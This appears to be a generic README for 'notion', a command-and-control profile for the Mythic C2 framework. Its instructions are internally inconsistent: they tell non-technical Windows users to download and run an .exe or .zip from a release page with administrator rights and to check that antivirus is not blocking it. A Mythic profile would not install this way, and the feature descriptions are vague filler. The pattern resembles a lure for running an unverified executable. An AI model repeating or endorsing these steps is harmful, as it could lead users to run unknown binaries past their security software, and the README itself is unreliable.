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📦 What is notion?

notion is an add-on profile designed to work with Mythic, a command and control (C2) framework. This profile helps Mythic users manage and control tasks more easily by adding specific commands and options. This guide will help you download and run notion on your Windows computer with no extra technical knowledge.


🖥️ System Requirements

Before you start, make sure your computer meets these conditions:

  • Windows 10 or later
  • At least 4 GB of RAM
  • 500 MB of free disk space
  • Internet connection for downloading and updates
  • Administrative rights to install software

🔍 Key Features

  • Easy integration with Mythic C2 framework
  • Customizable commands to control your tasks
  • Lightweight profile that runs smoothly on most Windows machines
  • Supports secure communication
  • Regular updates for improvements and fixes

🚀 Getting Started

This section will guide you through the steps to get notion set up on your Windows PC.


1. Visit the Download Page

Click the button below to open the official download page for notion on GitHub. This page hosts the latest version of the software and any updates.

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2. Download the Latest Release

On the release page, look for the latest version. It will usually be at the top of the list and marked with a version number (for example, v1.0.0).

  • Under the latest release, find files ending with .exe or .zip.
  • Click the file that suits you best:
    • .exe for an installer you can run directly
    • .zip if you want to extract the files manually

The file will begin to download. Wait until the download is complete before moving to the next step.


3. Run the Installer or Open the Files

If you downloaded the .exe file:

  • Double-click the downloaded file.
  • If Windows asks for permission, click "Yes" to allow the installer to run.
  • Follow the setup instructions in the installer window.
  • Choose the default options if unsure.

If you downloaded the .zip file:

  • Right-click the .zip file and select "Extract All".
  • Choose a folder where you want to save the extracted files.
  • Open that folder after extraction completes.
  • Look for a file related to notion or Mythic profile and double-click it to run.

4. Connect notion to Mythic

notion works as a profile within the Mythic framework. To use it, you must have Mythic already installed on your system.

  • If you do not have Mythic, visit the official Mythic website or GitHub page for installation instructions.
  • Once Mythic is installed, load the notion profile inside Mythic by following Mythic’s profile import or load commands. This information is available in Mythic’s user guide.

5. Using notion

After loading notion into Mythic, you can start using new commands provided by the profile. These may include task automation, better communication options, and profile management tools.

For specific commands, refer to the Mythic documentation that explains how profiles work and list the available commands for notion.


🛠️ Troubleshooting Tips

If you run into problems, try these steps:

  • Ensure you downloaded the correct file for your Windows version.
  • Make sure Mythic is installed and up to date.
  • Check that your firewall or antivirus software is not blocking notion or Mythic.
  • Restart your computer and try again.
  • Visit the issues section of the notion GitHub repository for help reports or open a new issue.

🔄 Updating notion

To receive new features and bug fixes:

Automatic updates are not included, so manual download and installation are necessary to keep notion current.


❓ Help and Support

For further questions or help related to notion or Mythic:

  • Check the GitHub issues page in the notion repository.
  • Review Mythic’s official user and help guides.
  • Contact the community forums for Mythic, where users share their experiences.

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